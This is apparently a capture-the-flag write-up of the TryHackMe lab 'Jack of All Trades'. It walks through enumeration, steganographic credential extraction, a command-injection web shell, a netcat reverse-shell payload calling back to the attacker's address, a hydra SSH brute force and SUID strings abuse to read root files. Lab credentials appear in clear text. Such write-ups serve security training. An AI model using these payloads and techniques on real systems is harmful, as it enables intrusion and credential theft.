TryHackMe: Jack of All Trades
Jack of All Trades is a fun room, barely looked at any write-ups, just to check if my instincts were right so i consider it not being directly looking at. Loving doing CTF’s, really is amazing.
https://tryhackme.com/room/jackofalltrades
Initial Enumeration
Nmap Scan
We start with our nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.153.98
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 14:32 GMT
Nmap scan report for 10.10.153.98
Host is up (0.087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Jack-of-all-trades!
|_http-server-header: Apache/2.4.10 (Debian)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
| 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
| 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.32 seconds
We see that the services are switched and trying to access port 22 we get an error with firefox:
Its normal for firefox to block these type of ports so to get around this we just have to configure firefox to allow port 22 to be accessed. To do so we go to about:config and search for network.security.ports.banned.override:
After that we select String and write 22:
Web 22
And now we should be able to access port 22:
Nothing much to see at first but on the source code we find an encoded text and a directory:
We see that its encoded with Base64 so we go to CyberChef and get the following:
We get a password but nowhere really to use it, so we go to the other directory we found, /recovery.php:
A login form that we can’t really use for now, but just like before the source code had some interesting things:
Its an encoded text again, so we throw it on CyberChef. This one was more complex but after some research we were able to get the message:
The message contained a link with a hint and going to it gave us a Wikipedia page:
Since the credentials were inside the homepage we went to check again and found a file in /assets/ with a similar name to the Wikipedia page:
With this we could only assume that there are files hidden inside the image, so we download it and use steghide with the only password we were able to get so far:
1
2
3
4
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide extract -sf stego.jpg
Enter passphrase:
wrote extracted data to "creds.txt".
And we got a text file with the following inside:
1
2
3
Hehe. Gotcha!
You're on the right path, but wrong image!
Wrong image! So we download the other images from the /assets/ directory and try to extract with the same password.
jackinthebox.jpg didn’t work but header.jpg did:
1
2
3
4
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide extract -sf header.jpg
Enter passphrase:
wrote extracted data to "cms.creds".
And it gave us the credentials to log into recovery.php:
1
2
3
4
Here you go Jack. Good thing you thought ahead!
Username: jackinthebox
Password: TplFxiSHjY
After we login we get the following page:
First instinct was to add ?cmd= to the current page and lucky enough it worked:
Shell as www-data
From here we could get a reverse shell to have more control. First step is to start our listener with nc -lvnp 4444, next we enter the payload to the cmd parameter:
1
http://10.10.153.98:22/nnxhweOV/index.php?cmd=mknod%20/tmp/backpipe%20p;%20/bin/sh%200%3C/tmp/backpipe%20|%20nc%2010.23.58.75%204444%20%3E/tmp/backpipe
And we are inside:
1
2
3
4
5
6
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
connect to [10.23.58.75] from (UNKNOWN) [10.10.153.98] 49348
whoami
www-data
Shell as jack
Looking around we find that inside the /home directory there’s a file called jacks_password_list:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
pwd
/home
ls -la
total 16
drwxr-xr-x 3 root root 4096 Feb 29 2020 .
drwxr-xr-x 23 root root 4096 Feb 29 2020 ..
drwxr-x--- 3 jack jack 4096 Feb 29 2020 jack
-rw-r--r-- 1 root root 408 Feb 29 2020 jacks_password_list
cat jacks_password_list
*hclqAzj+2GC+=0K
eN<A@n^zI?FE$I5,
X<(@zo2XrEN)#MGC
,,aE1K,nW3Os,afb
ITMJpGGIqg1jn?>@
0HguX{,fgXPE;8yF
sjRUb4*@pz<*ZITu
[8V7o^gl(Gjt5[WB
yTq0jI$d}Ka<T}PD
Sc.[[2pL<>e)vC4}
9;}#q*,A4wd{<X.T
M41nrFt#PcV=(3%p
GZx.t)H$&awU;SO<
.MVettz]a;&Z;cAC
2fh%i9Pr5YiYIf51
TDF@mdEd3ZQ(]hBO
v]XBmwAk8vk5t3EF
9iYZeZGQGG9&W4d1
8TIFce;KjrBWTAY^
SeUAwt7EB#fY&+yt
n.FZvJ.x9sYe5s5d
8lN{)g32PG,1?[pM
z@e1PmlmQ%k5sDz@
ow5APF>6r,y4krSo
We know that jack is an user and have a list of possible passwords for him so all we have to do now is use hydra and get the working password:
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -l jack -P list 10.10.153.98 ssh -s 80
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-10 15:14:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.153.98:80/
[80][ssh] host: 10.10.153.98 login: jack password: ITMJpGGIqg1jn?>@
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-10 15:14:59
Now with the password we log into ssh and when doing ls we find an image:
1
2
3
4
5
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh jack@10.10.153.98 -p 80
jack@10.10.153.98's password:
jack@jack-of-all-trades:~$ ls
user.jpg
To download it we go to our machine and use the scp command:
1
2
3
4
┌──(kali㉿kali)-[~/Desktop]
└─$ scp -P 80 jack@10.10.153.98:~/user.jpg .
jack@10.10.153.98's password:
user.jpg 100% 286KB 877.0KB/s 00:00
All we had to do was open the image and the user flag was there:
Next step is to get root flag so we start enumerating.
Looking at the binaries we see that strings has SUID bits:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
jack@jack-of-all-trades:/$ find / -type f -perm -04000 -ls 2>/dev/null
135127 456 -rwsr-xr-x 1 root root 464904 Mar 22 2015 /usr/lib/openssh/ssh-keysign
134730 288 -rwsr-xr-- 1 root messagebus 294512 Feb 9 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135137 12 -rwsr-xr-x 1 root root 10248 Apr 15 2015 /usr/lib/pt_chown
132828 44 -rwsr-xr-x 1 root root 44464 Nov 20 2014 /usr/bin/chsh
132795 56 -rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at
132826 56 -rwsr-xr-x 1 root root 53616 Nov 20 2014 /usr/bin/chfn
133088 40 -rwsr-xr-x 1 root root 39912 Nov 20 2014 /usr/bin/newgrp
133270 28 -rwsr-x--- 1 root dev 27536 Feb 25 2015 /usr/bin/strings
133273 148 -rwsr-xr-x 1 root root 149568 Mar 12 2015 /usr/bin/sudo
133111 56 -rwsr-xr-x 1 root root 54192 Nov 20 2014 /usr/bin/passwd
132940 76 -rwsr-xr-x 1 root root 75376 Nov 20 2014 /usr/bin/gpasswd
133161 88 -rwsr-sr-x 1 root mail 89248 Feb 11 2015 /usr/bin/procmail
138022 3052 -rwsr-xr-x 1 root root 3124160 Feb 17 2015 /usr/sbin/exim4
85 40 -rwsr-xr-x 1 root root 40000 Mar 29 2015 /bin/mount
131 28 -rwsr-xr-x 1 root root 27416 Mar 29 2015 /bin/umount
114 40 -rwsr-xr-x 1 root root 40168 Nov 20 2014 /bin/su
This means that we can read any file we want, and looking at the hint we just have to do:
1
2
3
4
5
6
7
8
jack@jack-of-all-trades:/$ strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: securi-tay2020_{REDACTED}